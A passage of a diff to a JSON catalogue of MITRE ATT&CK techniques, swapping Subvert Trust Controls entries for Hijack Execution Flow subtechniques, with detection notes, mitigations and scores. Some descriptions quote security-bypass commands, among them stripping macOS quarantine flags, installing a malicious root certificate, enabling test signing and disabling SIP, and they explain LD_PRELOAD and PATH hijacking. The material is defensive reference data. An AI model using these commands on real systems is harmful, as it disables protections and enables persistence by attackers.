+        "url": "https://attack.mitre.org/techniques/T1574/005",
         "tactics": [
-            "Defense Evasion"
+            "Defense Evasion",
+            "Persistence",
+            "Privilege Escalation"
         ],
-        "detection": "Collect and analyze signing certificate metadata on software that executes within the environment to look for unusual certificate characteristics and outliers. Periodically baseline registered SIPs and trust providers (Registry entries and files on disk), specifically looking for new, modified, or non-Microsoft entries. (Citation: SpectorOps Subverting Trust Sept 2017) A system's root certificates are unlikely to change frequently. Monitor new certificates installed on a system that could be due to malicious activity.(Citation: SpectorOps Code Signing Dec 2017)\n\nAnalyze Autoruns data for oddities and anomalies, specifically malicious files attempting persistent execution by hiding within auto-starting locations. Autoruns will hide entries signed by Microsoft or Windows by default, so ensure \"Hide Microsoft Entries\" and \"Hide Windows Entries\" are both deselected.(Citation: SpectorOps Subverting Trust Sept 2017) \n\nMonitor and investigate attempts to modify extended file attributes with utilities such as xattr. Built-in system utilities may generate high false positive alerts, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible. ",
+        "detection": "Look for changes to binaries and service executables that may normally occur during software updates. If an executable is written, renamed, and/or moved to match an existing service executable, it could be detected and correlated with other suspicious behavior. Hashing of binaries and service executables could be used to detect replacement against historical data.\n\nLook for abnormal process call trees from typical processes and services and for execution of other commands that could relate to Discovery or other adversary techniques.",
         "platforms": [
-            "Linux",
-            "Windows",
-            "macOS"
+            "Windows"
         ],
         "data_sources": [
-            "Command: Command Execution",
-            "File: File Metadata",
+            "File: File Creation",
             "File: File Modification",
             "Module: Module Load",
             "Process: Process Creation",
-            "Windows Registry: Windows Registry Key Creation",
-            "Windows Registry: Windows Registry Key Modification"
-        ],
-        "is_subtechnique": false,
-        "supertechnique": null,
-        "subtechniques": [
-            {
-                "tid": "T1553.001",
-                "name": "Subvert Trust Controls: Gatekeeper Bypass",
-                "url": "https://attack.mitre.org/techniques/T1553/001",
-                "description": "Adversaries may modify file attributes that signify programs are from untrusted sources to subvert Gatekeeper controls in macOS. When documents, applications, or programs are downloaded an extended attribute (xattr) called com.apple.quarantine can be set on the file by the application performing the download. This attribute, also known as a quarantine flag, is read by Apple's Gatekeeper defense program when the file is run and provides a prompt to the user to allow or deny execution. Gatekeeper also monitors an application's usage of dynamic libraries (dylibs) loaded outside the application folder on any quarantined binary, often using the dlopen function. If the quarantine flag is set in macOS 10.15+, Gatekeeper also checks for a notarization ticket and sends a cryptographic hash to Apple's servers to check for validity for all unsigned executables.(Citation: TheEclecticLightCompany apple notarization )(Citation: Bypassing Gatekeeper)\n\nThe quarantine flag is an opt-in system and not imposed by macOS. If an application opts-in, a file downloaded from the Internet will be given a quarantine flag before being saved to disk. Any application or user with write permissions to the file can change or strip the quarantine flag. With elevated permission (sudo), this attribute can be removed from any file. The presence of the com.apple.quarantine quarantine flag can be checked with the xattr command xattr -l /path/to/examplefile. Similarly, this attribute can be recursively removed from all files in a folder using xattr, sudo xattr -d com.apple.quarantine /path/to/folder.(Citation: 20 macOS Common Tools and Techniques)(Citation: TheEclecticLightCompany Quarantine and the flag)(Citation: theevilbit gatekeeper bypass 2021)\n\nApps and files loaded onto the system from a USB flash drive, optical disk, external hard drive, from a drive shared over the local network, or using the curl command do not set this flag. Additionally, it is possible to avoid setting this flag using [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), which may bypass Gatekeeper. (Citation: Methods of Mac Malware Persistence)(Citation: Clearing quarantine attribute)(Citation: OceanLotus for OS X)",
-                "detection": "The removal of the com.apple.quarantine flag by a user instead of the operating system is a suspicious action and should be examined further. Monitor and investigate attempts to modify extended file attributes with utilities such as xattr. Built-in system utilities may generate high false positive alerts, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible. Monitor software update frameworks that strip the com.apple.quarantine flag when performing updates. \n\nReview false values under the LSFileQuarantineEnabled entry in an application's Info.plist file (required by every application). false under LSFileQuarantineEnabled indicates that an application does not use the quarantine flag. Unsandboxed applications with an unspecified LSFileQuarantineEnabled entry will default to not setting the quarantine flag. \n\nQuarantineEvents is a SQLite database containing a list of all files assigned the com.apple.quarantine attribute, located at ~/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2. Each event contains the corresponding UUID, timestamp, application, Gatekeeper score, and decision if it was allowed.(Citation: TheEclecticLightCompany Quarantine and the flag)",
-                "mitigations": [
-                    {
-                        "mid": "M1038",
-                        "name": "Execution Prevention",
-                        "description": "Block execution of code on a system through application control, and/or script blocking.",
-                        "url": "https://attack.mitre.org/mitigations/M1038"
-                    }
-                ]
-            },
-            {
-                "tid": "T1553.002",
-                "name": "Subvert Trust Controls: Code Signing",
-                "url": "https://attack.mitre.org/techniques/T1553/002",
-                "description": "Adversaries may create, acquire, or steal code signing materials to sign their malware or tools. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. (Citation: Wikipedia Code Signing) The certificates used during an operation may be created, acquired, or stolen by the adversary. (Citation: Securelist Digital Certificates) (Citation: Symantec Digital Certificates) Unlike [Invalid Code Signature](https://attack.mitre.org/techniques/T1036/001), this activity will result in a valid signature.\n\nCode signing to verify software on first run can be used on modern Windows and macOS/OS X systems. It is not used on Linux due to the decentralized nature of the platform. (Citation: Wikipedia Code Signing) \n\nCode signing certificates may be used to bypass security policies that require signed code to execute on a system. ",
-                "detection": "Collect and analyze signing certificate metadata on software that executes within the environment to look for unusual certificate characteristics and outliers.",
-                "mitigations": []
-            },
-            {
-                "tid": "T1553.003",
-                "name": "Subvert Trust Controls: SIP and Trust Provider Hijacking",
-                "url": "https://attack.mitre.org/techniques/T1553/003",
-                "description": "Adversaries may tamper with SIP and trust provider components to mislead the operating system and application control tools when conducting signature validation checks. In user mode, Windows Authenticode (Citation: Microsoft Authenticode) digital signatures are used to verify a file's origin and integrity, variables that may be used to establish trust in signed code (ex: a driver with a valid Microsoft signature may be handled as safe). The signature validation process is handled via the WinVerifyTrust application programming interface (API) function,  (Citation: Microsoft WinVerifyTrust) which accepts an inquiry and coordinates with the appropriate trust provider, which is responsible for validating parameters of a signature. (Citation: SpectorOps Subverting Trust Sept 2017)\n\nBecause of the varying executable file types and corresponding signature formats, Microsoft created software components called Subject Interface Packages (SIPs) (Citation: EduardosBlog SIPs July 2008) to provide a layer of abstraction between API functions and files. SIPs are responsible for enabling API functions to create, retrieve, calculate, and verify signatures. Unique SIPs exist for most file formats (Executable, PowerShell, Installer, etc., with catalog signing providing a catch-all  (Citation: Microsoft Catalog Files and Signatures April 2017)) and are identified by globally unique identifiers (GUIDs). (Citation: SpectorOps Subverting Trust Sept 2017)\n\nSimilar to [Code Signing](https://attack.mitre.org/techniques/T1553/002), adversaries may abuse this architecture to subvert trust controls and bypass security policies that allow only legitimately signed code to execute on a system. Adversaries may hijack SIP and trust provider components to mislead operating system and application control tools to classify malicious (or any) code as signed by: (Citation: SpectorOps Subverting Trust Sept 2017)\n\n* Modifying the Dll and FuncName Registry values in HKLM\\SOFTWARE[\\WOW6432Node\\]Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllGetSignedDataMsg\\{SIP_GUID} that point to the dynamic link library (DLL) providing a SIP’s CryptSIPDllGetSignedDataMsg function, which retrieves an encoded digital certificate from a signed file. By pointing to a maliciously-crafted DLL with an exported function that always returns a known good signature value (ex: a Microsoft signature for Portable Executables) rather than the file’s real signature, an adversary can apply an acceptable signature value to all files using that SIP (Citation: GitHub SIP POC Sept 2017) (although a hash mismatch will likely occur, invalidating the signature, since the hash returned by the function will not match the value computed from the file).\n* Modifying the Dll and FuncName Registry values in HKLM\\SOFTWARE\\[WOW6432Node\\]Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllVerifyIndirectData\\{SIP_GUID} that point to the DLL providing a SIP’s CryptSIPDllVerifyIndirectData function, which validates a file’s computed hash against the signed hash value. By pointing to a maliciously-crafted DLL with an exported function that always returns TRUE (indicating that the validation was successful), an adversary can successfully validate any file (with a legitimate signature) using that SIP (Citation: GitHub SIP POC Sept 2017) (with or without hijacking the previously mentioned CryptSIPDllGetSignedDataMsg function). This Registry value could also be redirected to a suitable exported function from an already present DLL, avoiding the requirement to drop and execute a new file on disk.\n* Modifying the DLL and Function Registry values in HKLM\\SOFTWARE\\[WOW6432Node\\]Microsoft\\Cryptography\\Providers\\Trust\\FinalPolicy\\{trust provider GUID} that point to the DLL providing a trust provider’s FinalPolicy function, which is where the decoded and parsed signature is checked and the majority of trust decisions are made. Similar to hijacking SIP’s CryptSIPDllVerifyIndirectData function, this value can be redirected to a suitable exported function from an already present DLL or a maliciously-crafted DLL (though the implementation of a trust provider is complex).\n* **Note:** The above hijacks are also possible without modifying the Registry via [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).\n\nHijacking SIP or trust provider components can also enable persistent code execution, since these malicious components may be invoked by any application that performs code signing or signature validation. (Citation: SpectorOps Subverting Trust Sept 2017)",
-                "detection": "Periodically baseline registered SIPs and trust providers (Registry entries and files on disk), specifically looking for new, modified, or non-Microsoft entries. (Citation: SpectorOps Subverting Trust Sept 2017)\n\nEnable CryptoAPI v2 (CAPI) event logging (Citation: Entrust Enable CAPI2 Aug 2017) to monitor and analyze error events related to failed trust validation (Event ID 81, though this event can be subverted by hijacked trust provider components) as well as any other provided information events (ex: successful validations). Code Integrity event logging may also provide valuable indicators of malicious SIP or trust provider loads, since protected processes that attempt to load a maliciously-crafted trust validation component will likely fail (Event ID 3033). (Citation: SpectorOps Subverting Trust Sept 2017)\n\nUtilize Sysmon detection rules and/or enable the Registry (Global Object Access Auditing) (Citation: Microsoft Registry Auditing Aug 2016) setting in the Advanced Security Audit policy to apply a global system access control list (SACL) and event auditing on modifications to Registry values (sub)keys related to SIPs and trust providers: (Citation: Microsoft Audit Registry July 2012)\n\n* HKLM\\SOFTWARE\\Microsoft\\Cryptography\\OID\n* HKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\OID\n* HKLM\\SOFTWARE\\Microsoft\\Cryptography\\Providers\\Trust\n* HKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\Providers\\Trust\n\n**Note:** As part of this technique, adversaries may attempt to manually edit these Registry keys (ex: Regedit) or utilize the legitimate registration process using [Regsvr32](https://attack.mitre.org/techniques/T1218/010). (Citation: SpectorOps Subverting Trust Sept 2017)\n\nAnalyze Autoruns data for oddities and anomalies, specifically malicious files attempting persistent execution by hiding within auto-starting locations. Autoruns will hide entries signed by Microsoft or Windows by default, so ensure “Hide Microsoft Entries” and “Hide Windows Entries” are both deselected. (Citation: SpectorOps Subverting Trust Sept 2017)",
-                "mitigations": [
-                    {
-                        "mid": "M1038",
-                        "name": "Execution Prevention",
-                        "description": "Block execution of code on a system through application control, and/or script blocking.",
-                        "url": "https://attack.mitre.org/mitigations/M1038"
-                    },
-                    {
-                        "mid": "M1022",
-                        "name": "Restrict File and Directory Permissions",
-                        "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
-                        "url": "https://attack.mitre.org/mitigations/M1022"
-                    },
-                    {
-                        "mid": "M1024",
-                        "name": "Restrict Registry Permissions",
-                        "description": "Restrict the ability to modify certain hives or keys in the Windows Registry.",
-                        "url": "https://attack.mitre.org/mitigations/M1024"
-                    }
-                ]
-            },
-            {
-                "tid": "T1553.004",
-                "name": "Subvert Trust Controls: Install Root Certificate",
-                "url": "https://attack.mitre.org/techniques/T1553/004",
-                "description": "Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.(Citation: Wikipedia Root Certificate) Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.\n\nInstallation of a root certificate on a compromised system would give an adversary a way to degrade the security of that system. Adversaries have used this technique to avoid security warnings prompting users when compromised systems connect over HTTPS to adversary controlled web servers that spoof legitimate websites in order to collect login credentials.(Citation: Operation Emmental)\n\nAtypical root certificates have also been pre-installed on systems by the manufacturer or in the software supply chain and were used in conjunction with malware/adware to provide [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) capability for intercepting information transmitted over secure TLS/SSL communications.(Citation: Kaspersky Superfish)\n\nRoot certificates (and their associated chains) can also be cloned and reinstalled. Cloned certificate chains will carry many of the same metadata characteristics of the source and can be used to sign malicious code that may then bypass signature validation tools (ex: Sysinternals, antivirus, etc.) used to block execution and/or uncover artifacts of Persistence.(Citation: SpectorOps Code Signing Dec 2017)\n\nIn macOS, the Ay MaMi malware uses /usr/bin/security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain /path/to/malicious/cert to install a malicious certificate as a trusted root certificate into the system keychain.(Citation: objective-see ay mami 2018)",
-                "detection": "A system's root certificates are unlikely to change frequently. Monitor new certificates installed on a system that could be due to malicious activity.(Citation: SpectorOps Code Signing Dec 2017) Check pre-installed certificates on new systems to ensure unnecessary or suspicious certificates are not present. Microsoft provides a list of trustworthy root certificates online and through authroot.stl.(Citation: SpectorOps Code Signing Dec 2017) The Sysinternals Sigcheck utility can also be used (sigcheck[64].exe -tuv) to dump the contents of the certificate store and list valid certificates not rooted to the Microsoft Certificate Trust List.(Citation: Microsoft Sigcheck May 2017)\n\nInstalled root certificates are located in the Registry under HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Root\\Certificates\\ and [HKLM or HKCU]\\Software[\\Policies\\]\\Microsoft\\SystemCertificates\\Root\\Certificates\\. There are a subset of root certificates that are consistent across Windows systems and can be used for comparison:(Citation: Tripwire AppUNBlocker)\n\n* 18F7C1FCC3090203FD5BAA2F861A754976C8DD25\n* 245C97DF7514E7CF2DF8BE72AE957B9E04741E85\n* 3B1EFD3A66EA28B16697394703A72CA340A05BD5\n* 7F88CD7223F3C813818C994614A89C99FA3B5247\n* 8F43288AD272F3103B6FB1428485EA3014C0BCFE\n* A43489159A520F0D93D032CCAF37E7FE20A8B419\n* BE36A4562FB2EE05DBB3D32323ADF445084ED656\n* CDD4EEAE6000AC7F40C3802C171E30148030C072",
-                "mitigations": [
-                    {
-                        "mid": "M1028",
-                        "name": "Operating System Configuration",
-                        "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.",
-                        "url": "https://attack.mitre.org/mitigations/M1028"
-                    },
-                    {
-                        "mid": "M1054",
-                        "name": "Software Configuration",
-                        "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.",
-                        "url": "https://attack.mitre.org/mitigations/M1054"
-                    }
-                ]
-            },
-            {
-                "tid": "T1553.005",
-                "name": "Subvert Trust Controls: Mark-of-the-Web Bypass",
-                "url": "https://attack.mitre.org/techniques/T1553/005",
-                "description": "Adversaries may abuse specific file formats to subvert Mark-of-the-Web (MOTW) controls. In Windows, when files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.(Citation: Microsoft Zone.Identifier 2020) Files that are tagged with MOTW are protected and cannot perform certain actions. For example, starting in MS Office 10, if a MS Office file has the MOTW, it will open in Protected View. Executables tagged with the MOTW will be processed by Windows Defender SmartScreen that compares files with an allowlist of well-known executables. If the file in not known/trusted, SmartScreen will prevent the execution and warn the user not to run it.(Citation: Beek Use of VHD Dec 2020)(Citation: Outflank MotW 2020)(Citation: Intezer Russian APT Dec 2020)\n\nAdversaries may abuse container files such as compressed/archive (.arj, .gzip) and/or disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW. Container files downloaded from the Internet will be marked with MOTW but the files within may not inherit the MOTW after the container files are extracted and/or mounted. MOTW is a NTFS feature and many container files do not support NTFS alternative data streams. After a container file is extracted and/or mounted, the files contained within them may be treated as local files on disk and run without protections.(Citation: Beek Use of VHD Dec 2020)(Citation: Outflank MotW 2020)",
-                "detection": "Monitor compressed/archive and image files downloaded from the Internet as the contents may not be tagged with the MOTW. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities.",
-                "mitigations": [
-                    {
-                        "mid": "M1038",
-                        "name": "Execution Prevention",
-                        "description": "Block execution of code on a system through application control, and/or script blocking.",
-                        "url": "https://attack.mitre.org/mitigations/M1038"
-                    }
-                ]
-            },
-            {
-                "tid": "T1553.006",
-                "name": "Subvert Trust Controls: Code Signing Policy Modification",
-                "url": "https://attack.mitre.org/techniques/T1553/006",
-                "description": "Adversaries may modify code signing policies to enable execution of unsigned or self-signed code. Code signing provides a level of authenticity on a program from a developer and a guarantee that the program has not been tampered with. Security controls can include enforcement mechanisms to ensure that only valid, signed code can be run on an operating system. \n\nSome of these security controls may be enabled by default, such as Driver Signature Enforcement (DSE) on Windows or System Integrity Protection (SIP) on macOS.(Citation: Microsoft DSE June 2017)(Citation: Apple Disable SIP) Other such controls may be disabled by default but are configurable through application controls, such as only allowing signed Dynamic-Link Libraries (DLLs) to execute on a system. Since it can be useful for developers to modify default signature enforcement policies during the development and testing of applications, disabling of these features may be possible with elevated permissions.(Citation: Microsoft Unsigned Driver Apr 2017)(Citation: Apple Disable SIP)\n\nAdversaries may modify code signing policies in a number of ways, including through use of command-line or GUI utilities, [Modify Registry](https://attack.mitre.org/techniques/T1112), rebooting the computer in a debug/recovery mode, or by altering the value of variables in kernel memory.(Citation: Microsoft TESTSIGNING Feb 2021)(Citation: Apple Disable SIP)(Citation: FireEye HIKIT Rootkit Part 2)(Citation: GitHub Turla Driver Loader) Examples of commands that can modify the code signing policy of a system include bcdedit.exe -set TESTSIGNING ON on Windows and csrutil disable on macOS.(Citation: Microsoft TESTSIGNING Feb 2021)(Citation: Apple Disable SIP) Depending on the implementation, successful modification of a signing policy may require reboot of the compromised system. Additionally, some implementations can introduce visible artifacts for the user (ex: a watermark in the corner of the screen stating the system is in Test Mode). Adversaries may attempt to remove such artifacts.(Citation: F-Secure BlackEnergy 2014)\n\nTo gain access to kernel memory to modify variables related to signature checks, such as modifying g_CiOptions to disable Driver Signature Enforcement, adversaries may conduct [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068) using a signed, but vulnerable driver.(Citation: Unit42 AcidBox June 2020)(Citation: GitHub Turla Driver Loader)",
-                "detection": "Monitor processes and command-line arguments for actions that could be taken to modify the code signing policy of a system, such as bcdedit.exe -set TESTSIGNING ON.(Citation: Microsoft TESTSIGNING Feb 2021) Consider monitoring for modifications made to Registry keys associated with code signing policies, such as HKCU\\Software\\Policies\\Microsoft\\Windows NT\\Driver Signing. Modifications to the code signing policy of a system are likely to be rare.",
-                "mitigations": [
-                    {
-                        "mid": "M1046",
-                        "name": "Boot Integrity",
-                        "description": "Use secure methods to boot a system and verify the integrity of the operating system and loading mechanisms.",
-                        "url": "https://attack.mitre.org/mitigations/M1046"
-                    },
-                    {
-                        "mid": "M1026",
-                        "name": "Privileged Account Management",
-                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
-                        "url": "https://attack.mitre.org/mitigations/M1026"
-                    },
-                    {
-                        "mid": "M1024",
-                        "name": "Restrict Registry Permissions",
-                        "description": "Restrict the ability to modify certain hives or keys in the Windows Registry.",
-                        "url": "https://attack.mitre.org/mitigations/M1024"
-                    }
-                ]
-            }
+            "Service: Service Metadata"
         ],
-        "mitigations": [
-            {
-                "mid": "M1038",
-                "name": "Execution Prevention",
-                "description": "Block execution of code on a system through application control, and/or script blocking.",
-                "url": "https://attack.mitre.org/mitigations/M1038"
-            },
-            {
-                "mid": "M1028",
-                "name": "Operating System Configuration",
-                "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.",
-                "url": "https://attack.mitre.org/mitigations/M1028"
+        "is_subtechnique": true,
+        "supertechnique": "T1574",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1047",
+                "name": "Audit",
+                "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
+                "url": "https://attack.mitre.org/mitigations/M1047"
             },
             {
-                "mid": "M1024",
-                "name": "Restrict Registry Permissions",
-                "description": "Restrict the ability to modify certain hives or keys in the Windows Registry.",
-                "url": "https://attack.mitre.org/mitigations/M1024"
+                "mid": "M1052",
+                "name": "User Account Control",
+                "description": "Configure Windows User Account Control to mitigate risk of adversaries obtaining elevated process access.",
+                "url": "https://attack.mitre.org/mitigations/M1052"
             },
             {
-                "mid": "M1054",
-                "name": "Software Configuration",
-                "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.",
-                "url": "https://attack.mitre.org/mitigations/M1054"
+                "mid": "M1018",
+                "name": "User Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1018"
             }
         ],
-        "cumulative_score": 0.3822572228571429,
-        "adjusted_score": 0.3822572228571429,
+        "cumulative_score": 0.3380952380952381,
+        "adjusted_score": 0.3380952380952381,
         "has_car": false,
         "has_sigma": true,
-        "has_es_siem": false,
-        "has_splunk": false,
+        "has_es_siem": true,
+        "has_splunk": true,
         "cis_controls": [
-            "2.5",
-            "2.6",
             "4.1",
-            "4.8",
+            "4.7",
+            "5.3",
+            "5.4",
+            "6.1",
+            "6.2",
+            "6.8",
+            "16.13",
             "18.3",
             "18.5"
         ],
         "nist_controls": [
+            "AC-2",
+            "AC-3",
+            "AC-4",
+            "AC-5",
             "AC-6",
             "CA-8",
-            "CM-10",
             "CM-2",
-            "CM-3",
             "CM-5",
             "CM-6",
-            "CM-7",
-            "CM-8",
-            "IA-7",
-            "IA-9",
-            "RA-9",
-            "SA-10",
-            "SA-11",
-            "SC-34",
-            "SI-10",
-            "SI-2",
-            "SI-4",
-            "SI-7"
+            "IA-2",
+            "RA-5",
+            "SI-4"
         ],
         "process_coverage": true,
         "network_coverage": false,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.24285714285714288,
-            "mitigation_score": 0.45454545454545453,
-            "detection_score": 0.01
-        },
-        "choke_point_score": 0.1,
-        "prevalence_score": 0.03940008
+        "hardware_coverage": false
     },
     {
-        "tid": "T1554",
-        "name": "Compromise Client Software Binary",
-        "description": "Adversaries may modify client software binaries to establish persistent access to systems. Client software enables users to access services provided by a server. Common client software types are SSH clients, FTP clients, email clients, and web browsers.\n\nAdversaries may make modifications to client software binaries to carry out malicious tasks when those applications are in use. For example, an adversary may copy source code for the client software, add a backdoor, compile for the target, and replace the legitimate application binary (or support files) with the backdoored one. Since these applications may be routinely executed by the user, the adversary can leverage this for persistent access to the host.",
-        "url": "https://attack.mitre.org/techniques/T1554",
+        "tid": "T1574.006",
+        "name": "Hijack Execution Flow: Dynamic Linker Hijacking",
+        "description": "Adversaries may execute their own malicious payloads by hijacking environment variables the dynamic linker uses to load shared libraries. During the execution preparation phase of a program, the dynamic linker loads specified absolute paths of shared libraries from environment variables and files, such as LD_PRELOAD on Linux or DYLD_INSERT_LIBRARIES on macOS. Libraries specified in environment variables are loaded first, taking precedence over system libraries with the same function name.(Citation: Man LD.SO)(Citation: TLDP Shared Libraries)(Citation: Apple Doco Archive Dynamic Libraries) These variables are often used by developers to debug binaries without needing to recompile, deconflict mapped symbols, and implement custom functions without changing the original library.(Citation: Baeldung LD_PRELOAD)\n\nOn Linux and macOS, hijacking dynamic linker variables may grant access to the victim process's memory, system/network resources, and possibly elevated privileges. This method may also evade detection from security products since the execution is masked under a legitimate process. Adversaries can set environment variables via the command line using the export command, setenv function, or putenv function. Adversaries can also leverage [Dynamic Linker Hijacking](https://attack.mitre.org/techniques/T1574/006) to export variables in a shell or set variables programmatically using higher level syntax such Python’s os.environ.\n\nOn Linux, adversaries may set LD_PRELOAD to point to malicious libraries that match the name of legitimate libraries which are requested by a victim program, causing the operating system to load the adversary's malicious code upon execution of the victim program. LD_PRELOAD can be set via the environment variable or /etc/ld.so.preload file.(Citation: Man LD.SO)(Citation: TLDP Shared Libraries) Libraries specified by LD_PRELOAD are loaded and mapped into memory by dlopen() and mmap() respectively.(Citation: Code Injection on Linux and macOS)(Citation: Uninformed Needle) (Citation: Phrack halfdead 1997)(Citation: Brown Exploiting Linkers) \n\nOn macOS this behavior is conceptually the same as on Linux, differing only in how the macOS dynamic libraries (dyld) is implemented at a lower level. Adversaries can set the DYLD_INSERT_LIBRARIES environment variable to point to malicious libraries containing names of legitimate libraries or functions requested by a victim program.(Citation: TheEvilBit DYLD_INSERT_LIBRARIES)(Citation: Timac DYLD_INSERT_LIBRARIES)(Citation: Gabilondo DYLD_INSERT_LIBRARIES Catalina Bypass) ",
+        "url": "https://attack.mitre.org/techniques/T1574/006",
         "tactics": [
-            "Persistence"
+            "Defense Evasion",
+            "Persistence",
+            "Privilege Escalation"
         ],
-        "detection": "Collect and analyze signing certificate metadata and check signature validity on software that executes within the environment. Look for changes to client software that do not correlate with known software or patch cycles. \n\nConsider monitoring for anomalous behavior from client applications, such as atypical module loads, file reads/writes, or network connections.",
+        "detection": "Monitor for changes to environment variables and files associated with loading shared libraries such as LD_PRELOAD and DYLD_INSERT_LIBRARIES, as well as the commands to implement these changes.\n\nMonitor processes for unusual activity (e.g., a process that does not use the network begins to do so). Track library metadata, such as a hash, and compare libraries that are loaded at process execution time against previous executions to detect differences that do not correlate with patching or updates.",
         "platforms": [
             "Linux",
-            "Windows",
             "macOS"
         ],
         "data_sources": [
+            "Command: Command Execution",
             "File: File Creation",
-            "File: File Deletion",
-            "File: File Metadata",
-            "File: File Modification"
+            "File: File Modification",
+            "Module: Module Load",
+            "Process: Process Creation"
         ],
-        "is_subtechnique": false,
-        "supertechnique": null,
+        "is_subtechnique": true,
+        "supertechnique": "T1574",
         "subtechniques": [],
         "mitigations": [
             {
-                "mid": "M1045",
-                "name": "Code Signing",
-                "description": "Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.",
-                "url": "https://attack.mitre.org/mitigations/M1045"
+                "mid": "M1038",
+                "name": "Execution Prevention",
+                "description": "Block execution of code on a system through application control, and/or script blocking.",
+                "url": "https://attack.mitre.org/mitigations/M1038"
+            },
+            {
+                "mid": "M1028",
+                "name": "Operating System Configuration",
+                "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.",
+                "url": "https://attack.mitre.org/mitigations/M1028"
             }
         ],
-        "cumulative_score": 0.2857142857142857,
-        "adjusted_score": 0.2857142857142857,
-        "has_car": false,
+        "cumulative_score": 0.18095238095238095,
+        "adjusted_score": 0.18095238095238095,
+        "has_car": true,
         "has_sigma": true,
         "has_es_siem": true,
-        "has_splunk": true,
+        "has_splunk": false,
         "cis_controls": [
-            "2.7",
-            "4.1"
+            "2.5",
+            "2.6"
         ],
         "nist_controls": [
-            "CA-8",
-            "CM-2",
             "CM-6",
-            "IA-9",
-            "SI-7",
-            "SR-11",
-            "SR-4",
-            "SR-5",
-            "SR-6"
+            "CM-7",
+            "SI-10",
+            "SI-7"
         ],
-        "process_coverage": false,
+        "process_coverage": true,
         "network_coverage": false,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.18571428571428572,
-            "mitigation_score": 0.2,
-            "detection_score": 0.17
-        },
-        "choke_point_score": 0.1,
-        "prevalence_score": 0
+        "hardware_coverage": false
     },
     {
-        "tid": "T1555",
-        "name": "Credentials from Password Stores",
-        "description": "Adversaries may search for common password storage locations to obtain user credentials. Passwords are stored in several places on a system, depending on the operating system or application holding the credentials. There are also specific applications that store passwords to make it easier for users manage and maintain. Once credentials are obtained, they can be used to perform lateral movement and access restricted information.",
-        "url": "https://attack.mitre.org/techniques/T1555",
+        "tid": "T1574.007",
+        "name": "Hijack Execution Flow: Path Interception by PATH Environment Variable",
+        "description": "Adversaries may execute their own malicious payloads by hijacking environment variables used to load libraries. Adversaries may place a program in an earlier entry in the list of directories stored in the PATH environment variable, which Windows will then execute when it searches sequentially through that PATH listing in search of the binary that was called from a script or the command line.\n\nThe PATH environment variable contains a list of directories. Certain methods of executing a program (namely using cmd.exe or the command-line) rely solely on the PATH environment variable to determine the locations that are searched for a program when the path for the program is not given. If any directories are listed in the PATH environment variable before the Windows directory, %SystemRoot%\\system32 (e.g., C:\\Windows\\system32), a program may be placed in the preceding directory that is named the same as a Windows program (such as cmd, PowerShell, or Python), which will be executed when that command is executed from a script or command-line.\n\nFor example, if C:\\example path precedes C:\\Windows\\system32 is in the PATH environment variable, a program that is named net.exe and placed in C:\\example path will be called instead of the Windows system \"net\" when \"net\" is executed from the command-line.",
+        "url": "https://attack.mitre.org/techniques/T1574/007",
         "tactics": [
-            "Credential Access"
+            "Defense Evasion",
+            "Persistence",
+            "Privilege Escalation"
         ],
-        "detection": "Monitor system calls, file read events, and processes for suspicious activity that could indicate searching for a password  or other activity related to performing keyword searches (e.g. password, pwd, login, store, secure, credentials, etc.) in process memory for credentials. File read events should be monitored surrounding known password storage applications.",
+        "detection": "Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as \"findstr,\" \"net,\" and \"python\"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.\n\nData and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.",
         "platforms": [
-            "Linux",
-            "Windows",
-            "macOS"
+            "Windows"
         ],
         "data_sources": [
-            "Command: Command Execution",
-            "File: File Access",
-            "Process: OS API Execution",
-            "Process: Process Access",
+            "File: File Creation",
+            "File: File Modification",
             "Process: Process Creation"
         ],
